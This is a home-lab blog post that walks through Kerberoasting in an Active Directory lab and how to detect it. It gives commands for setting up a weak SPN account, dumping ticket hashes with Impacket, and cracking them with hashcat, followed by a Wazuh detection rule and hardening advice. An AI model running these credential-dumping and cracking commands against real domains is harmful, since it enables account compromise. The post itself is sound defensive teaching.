raghv.dev
Back to Blog
Lab
10 min read
June 7, 2026

Kerberoasting: Attack, Detect, and Defend

Full red-blue exercise: executing Kerberoasting in my AD home lab and building Wazuh detection rules to catch it in real time.

TABLE OF CONTENTS

What is Kerberoasting?

Kerberoasting is a post-exploitation technique where an attacker with any valid domain account requests Kerberos service tickets and cracks them offline. It targets accounts with Service Principal Names (SPNs).

This lab was performed in a fully isolated home environment. Never attempt this on networks you do not own.

Lab Environment

  • Attacker: Kali Linux + Impacket
  • Victim: Windows Server 2022 AD with a weak service account
  • Defender: Wazuh SIEM monitoring DC event logs

Setup: Creating a Vulnerable Service Account

powershell
New-ADUser -Name 'svc-webapp' -AccountPassword (ConvertTo-SecureString 'Password123!' -AsPlainText -Force) -Enabled $true
setspn -a HTTP/webapp.lab.local svc-webapp

The Attack

bash
python3 GetUserSPNs.py lab.local/user:Pass -dc-ip 192.168.1.10 -request -outputfile hashes.txt
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

Detection with Wazuh

Event ID 4769 with RC4 encryption type 0x17 is the giveaway:

xml
<rule id="100010" level="12">
  <field name="win.system.eventID">^4769$</field>
  <field name="win.eventdata.ticketEncryptionType">^0x17$</field>
  <description>Kerberoasting: RC4 ticket requested</description>
  <mitre><id>T1558.003</id></mitre>
</rule>

Enforcing AES-256 for all service accounts eliminates crackable hashes entirely. RC4 should be disabled org-wide.

Key Takeaways

  • Detection must happen on the DC via Windows event logs
  • Kerberoasting is invisible to network-level monitoring
  • Fix: disable RC4, use 25+ char service account passwords, audit SPNs
  • MITRE ATT&CK: T1558.003
active-directorykerberoastingdetectionwindowsmitre
← All Posts
[INFO] Wazuh agent heartbeat · DC-01 · homecorp.local · OK·[WARN] Failed SSH auth attempt · 192.168.56.102 · Rule 5710 · Level 5·[INFO] Nmap scan completed · WEB01 · 23 open ports detected · Logged·[ALERT] Hydra brute-force detected · admin@192.168.56.101 · BLOCKED·[INFO] SPL query executed · index=security · 4,892 events returned·[INFO] ISC2 CC · PASSED · 2024 · Credential active·[INFO] CompTIA Security+ SY0-701 · PASSED · 2025 · Credential active·[WARN] Gobuster scan detected · /api/admin · 403 returned · Alert fired·[INFO] Wireshark PCAP capture · eth0 · 12,441 packets · Saved·[INFO] System status · LEARNING · BUILDING · AVAILABLE FOR SOC ROLES·[INFO] GPO applied · homecorp.local · Password policy · min 12 chars·[ALERT] Nikto scan from KALI01 · WEB01 · Wazuh alert · Severity: High·[INFO] Wazuh agent heartbeat · DC-01 · homecorp.local · OK·[WARN] Failed SSH auth attempt · 192.168.56.102 · Rule 5710 · Level 5·[INFO] Nmap scan completed · WEB01 · 23 open ports detected · Logged·[ALERT] Hydra brute-force detected · admin@192.168.56.101 · BLOCKED·[INFO] SPL query executed · index=security · 4,892 events returned·[INFO] ISC2 CC · PASSED · 2024 · Credential active·[INFO] CompTIA Security+ SY0-701 · PASSED · 2025 · Credential active·[WARN] Gobuster scan detected · /api/admin · 403 returned · Alert fired·[INFO] Wireshark PCAP capture · eth0 · 12,441 packets · Saved·[INFO] System status · LEARNING · BUILDING · AVAILABLE FOR SOC ROLES·[INFO] GPO applied · homecorp.local · Password policy · min 12 chars·[ALERT] Nikto scan from KALI01 · WEB01 · Wazuh alert · Severity: High·